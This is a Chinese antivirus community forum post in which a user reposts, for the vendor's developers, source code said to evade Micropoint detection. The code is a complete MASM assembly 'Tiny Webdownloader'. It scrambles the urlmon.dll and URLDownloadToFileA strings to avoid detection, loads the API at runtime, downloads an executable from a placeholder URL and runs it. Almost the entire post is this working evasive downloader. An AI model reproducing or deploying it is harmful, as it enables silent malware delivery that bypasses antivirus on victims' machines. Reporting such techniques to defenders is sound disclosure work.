xiahanxing
新手上路
积分 2
发帖 2
注册 2006-9-6
|
#1 我从别的看到的一种病毒通过微点的思路
我从别的看到的一种病毒通过微点的思路
转载过来 微点研发人员看看 hoho
过微点的方法(源码)
不被微点报的前提是 不访问网络,不生孩子
;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;unremote@knology.net
.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0
.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?
.code
_main:
;unscrambles urlmon.dll
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1
;unscrambles URLDownloadToFileA
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5
;loads urlmon.dll
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax
;links URLDownloadToFileA dynamically
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax
;delete previous version
invoke DeleteFile, addr Exe
;downloads the exe
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile
;runs the exe
invoke WinExec, addr Exe, 0
;exits
invoke ExitProcess, 0
end _main
| |
※ ※ ※ 本文纯属【xiahanxing】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
 |
|
